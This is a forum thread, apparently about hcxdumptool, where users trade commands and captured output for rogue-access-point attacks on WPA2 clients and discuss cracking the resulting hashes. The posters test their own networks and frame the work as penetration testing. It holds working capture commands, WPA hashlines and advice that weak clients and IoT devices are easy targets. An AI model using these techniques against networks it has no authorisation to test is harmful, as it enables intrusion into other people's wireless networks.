hcxdumptool - missing frames w/ filtering
#11
mt7921u is a new driver:
https://github.com/morrownr/USB-WiFi/issues/137
and we have to expect a lot of issues oon it.

rtl8814au depend on NETLINK and hcxdumptool doesn't use NETLINK.

AWUS036ACM is working fine.

Please notice that the range on 5GHZ if less than half as on 2.4GHz.
Reply
#12
Thanks! I’ll try 36ACM
Reply
#13
A nice video is here:
https://www.youtube.com/watch?v=Usw0IlGbkC4
Reply
#14
Thanks again! I saw it already couple weeks ago. It was impressive, when i saw it, but when I tried to brute force my 10+ marks wpa2 password on v100 nvidia, i realized that video is actually “tricked”. How the hell he knows which mask for hashcat to use. If password is 8 marks w/ digits only, ok it took 30 min to brute force on v100 nvidia.
Reply
#15
Testing now ACM36 with stock antennas. First tried injection: 
Code:
$ sudo hcxdumptool -i wlan0 --check_injection -c 6
initialization of hcxdumptool 6.2.6 (depending on the capabilities of the device, this may take some time)...
starting antenna test and packet injection test (that can take up to two minutes)...
stage 2 of 2 probing frequency 5865/173 proberesponse 107 
packet injection is working on 2.4GHz!
injection ratio: 21% (BEACON: 503 PROBERESPONSE: 107)
your injection ratio is poor - improve your equipment and/or get closer to the target
antenna ratio: 31% (NETWORK: 22 PROBERESPONSE: 7)
your antenna ratio is average, but there is still room for improvement

After that turned off my AP and run hcxdumptool with essid list in beacon: 
Code:
sudo hcxdumptool -i wlan0 -o dump.pcapng --enable_status=31 --essidlist=essid --active_beacon
 SSID.......: ASK88
MAC_AP.....: 00054fca9e3c (Unknown)
MAC_CLIENT.: a07817ab4970 (Unknown)
VERSION....: 802.1X-2004 (2)
KEY VERSION: WPA2
REPLAYCOUNT: 63804
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: fdf1586b39920f78be6265942dcb96e8
HASHLINE...: WPA*02*fdf1586b39920f78be6265942dcb96e8*00054fca9e3c*a07817ab4970*41534b3838*5f163f74b712f513da4d89290b49282e661e1f86f90958873a063de9dd3c0a8d*0203007502010a0010000000000000f93c8b153e17d1c69ff3b457c403d2b9c7ae3efc4fb1e864f38890b333bcaa0ef8fd000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020c00*10

SSID.......: ASK88
MAC_AP.....: 00054fca9e3c (Unknown)
MAC_CLIENT.: dce99422f2a4 (Unknown)
VERSION....: 802.1X-2001 (1)
KEY VERSION: WPA2
REPLAYCOUNT: 63804
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: ccaf2a25d20ceb5817fb6707cc8c8ab9
HASHLINE...: WPA*02*ccaf2a25d20ceb5817fb6707cc8c8ab9*00054fca9e3c*dce99422f2a4*41534b3838*5f163f74b712f513da4d89290b49282e661e1f86f90958873a063de9dd3c0a8d*0103007502010a0000000000000000f93c1399badf3e231b14299562944641368fc032a0c91da5441cf8f00a09e9d4abe0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020c00*10
Got two hashes from clients.

After that turned on AP and run hcxdumptool in standart mode: 
Code:
sudo hcxdumptool -i wlan0 -o dump.pcapng --enable_status=31

SSID.......: ASK88
MAC_AP.....: 0024fbc000e1 (Unknown)
MAC_CLIENT.: dce99422f2a4 (Unknown)
VERSION....: 802.1X-2001 (1)
KEY VERSION: WPA2
REPLAYCOUNT: 63129
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: 2068dcdb59d1472326a69744223463c5
HASHLINE...: WPA*02*2068dcdb59d1472326a69744223463c5*0024fbc000e1*dce99422f2a4*41534b3838*3df826a2aca69b771ce04743bb5602bb06fcfd6d1f006c04d487847758a78399*0103007502010a0000000000000000f6994458ce666c1df885334f1934042ad574181fc118864d1d90e6af6f3e6103e89f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020c00*10

While attacking clients. i got two hashes. While attacking AP got AP's one Wink

From all obtained hashes password was recovered.

Question is what are the benefits of attacking client vs attacking AP?
Reply
#16
Nice to hear that it is working as expected.

It is much easier to attack a weak CLIENT than a hardened ACCESS POINT.
It is much easier to get within range of a mobile CLIENT than to get within the range of a stationary AP.
In every case an EAPOL M2 of a CLIENT is unencrypted.
You get a lot of useful information from EAP identity frames and undirected PROBEREQUEST frames coming from a CLIENT.
Depending on the wpa-supplicant.conf of a CLIENT you'll get hashes of all(!) entries of this conf.
You do not need nonce-error-corrections (hashcat --nonce-error-corrections=0) which speedup hashcat.

Let us say you are a penetration tester and have received the order to check the security of a large company.
You located the ACCESS POINT, attacked it and you got a PMKID and/or a 4way handshake.
Next step is to run hashcat to check if the PSK of the Ap is weak. That will take a while and if it is not weak, you may think everything is well secured, because hashcat was not able to recover the PSK.
Now run hcxdumptool and attack all CLIENTs connected to this AP. If only one CLIENT is weak (transmit PSK within PROBEREQUEST or EAP identity frame) you got the secured PSK, e.g.:
If a user made a typo (type PSK insted of ESSID and ESSID instead of PSK). This information is now stored in its wpa-supplicant.conf and the device transmit the PSK in form of undirected PROBEREQUEST frames.
The more CLIENTs the better the chance to identify a weak one and the entire company is compromised.



BTW:
The injection ratio and the antenna ratio depends on many factors:
TX power of target (TX power of the attack device should always be the same as the TX power of the target devise)
RX sensitivity of target
RX sensitivity of attack device
Frequency
Antenna gain of target
Antenna gain of attack device
Fresnel zone
Assignment of a radio channel (802.11 use time slots which allow a station to transmit or not)
and more...

hcxdumptool is measuring in both directions (attack device -> target and target -> attack device).
If you run the injection test several times, you'll get several different results, depending on the parameters mentioned above which are highly unpredictable.

But anyway, 802.11 is packet oriented and it is more enough if a few packets (mostly 3) reach the target and a few packets reach the attack device (mostly 3).
Reply
#17
I forgot to mention WiFi based IoT devices. A lot of them are weak (mostly due to wireless misconfiguration):
WiFi based coffee machines, toothbrushes, bathroom scales, door bells, security cams, and much more...).
hcxdumptool will help to identify the weak CLIENTs.
Reply
#18
I tried to attack CLIENTs while my AP is ON. Result is that no clients hashes were obtained, my AP hash only. Looks like attacking clients assume that they are must be out of the AP range, or AP must be off. Is that correct?
Reply
#19
That highly depend on command line options. Add your target ESSID to beaconlist and activate active beaconing
Code:
$ sudo hcxdumptool -i INTERFACE -o dump.pcapng --enable_status=63 --essidlist=beaconlist --active_beacon
Real time display will now show something like this:
Code:
start capturing (stop with ctrl+c)
NMEA 0183 SENTENCE........: N/A
PHYSICAL INTERFACE........: phy0
INTERFACE NAME............: wlp39s0f3u1u1u2
INTERFACE PROTOCOL........: IEEE 802.11
INTERFACE TX POWER........: 20 dBm (lowest value reported by the device)
INTERFACE HARDWARE MAC....: 00e0614861dd (not used for the attack)
INTERFACE VIRTUAL MAC.....: 00e0614861dd (not used for the attack)
DRIVER....................: mt7601u
DRIVER VERSION............: 5.17.4-arch1-1
DRIVER FIRMWARE VERSION...: N/A
openSSL version...........: 1.1
ERRORMAX..................: 100 errors
BPF code blocks...........: 0
FILTERLIST ACCESS POINT...: 0 entries
FILTERLIST CLIENT.........: 0 entries
FILTERMODE................: unused
WEAK CANDIDATE............: 12345678
ESSID list................: 0 entries
ACCESS POINT (ROGUE)......: 000d58c1ce00 (BROADCAST WILDCARD used for the attack)
ACCESS POINT (ROGUE)......: 000d58c1ce01 (BROADCAST OPEN used for the attack)
ACCESS POINT (ROGUE)......: 000d58c1ce02 (used for the attack and incremented on every new client)
CLIENT (ROGUE)............: c02250adb8f5
EAPOLTIMEOUT..............: 20000 usec
EAPOLEAPTIMEOUT...........: 2500000 usec
REPLAYCOUNT...............: 61716
ANONCE....................: 90fe8fc68c095d20c062252428a1654cef944a1a6de60667fde0cecad0f6fb2c
SNONCE....................: 601f7f1a918f639df71a84274c7f8f75ca00da57a24a8646c92305766c36c26b

TIME     FREQ/CH  MAC_DEST     MAC_SOURCE   ESSID [FRAME TYPE]
11:28:33 2472/13  ffffffffffff 0896d798e19e [WILDCARD BEACON]
11:28:34 2472/13  f6c56a62c874 0896d798e19e TEST-HIDDEN-ESSID [PROBERESPONSE]
11:46:43 2462/11  00e62d021987 0896d798e19e TEST-HIDDEN-ESSID [ROGUE PROBERESPONSE]
11:28:39 2472/13  00e62d021987 0896d798e19e TEST-HIDDEN-ESSID [AUTHENTICATION]
11:28:39 2472/13  00e62d021987 0896d798e19e TEST-HIDDEN-ESSID [ASSOCIATION]
11:28:39 2472/13  00e62d021987 0896d798e19e TEST-HIDDEN-ESSID [EAPOL:M1M2ROGUE EAPOLTIME:2121 RC:61716 KDV:2 PSK:12345678]
11:28:40 2472/13  00e62d021987 0896d798e19e TEST-HIDDEN-ESSID [EAPOL:M2M3 EAPOLTIME:1950 RC:3 KDV:2]
11:28:40 2472/13  00e62d021987 0896d798e19e TEST-HIDDEN-ESSID [EAPOL:M3M4ZEROED EAPOLTIME:3329 RC:3 KDV:2]

Explanation:
A CLIENT will not leave the AP it is connected to, if it doesn't receive a BEACON advertising better conditions.
And as a bonus, it will unhide a hidden ESSID.
Reply
#20
My code was exactly the same as when i attacked clients with my AP OFF: 
Code:
sudo hcxdumptool -i wlan0 -o dump.pcapng --enable_status=31 --essidlist=essid --active_beacon
but this time my AP was ON and result no clients hashes, which means that my AP provides better conditions to clients, than my ACM adapter. BTW i'm using VMWare Fusion to host _Kali to run hcxdumptool, which in not recommended in --help? Is it much better to run dedicated hardware to feed ACM adapter?

Now to target my IoT coffemaker or other smart devices, they are always connected to my AP. So to effectively attack them do i need to be much close to them with my antenna, compare to they distance to the AP?
Reply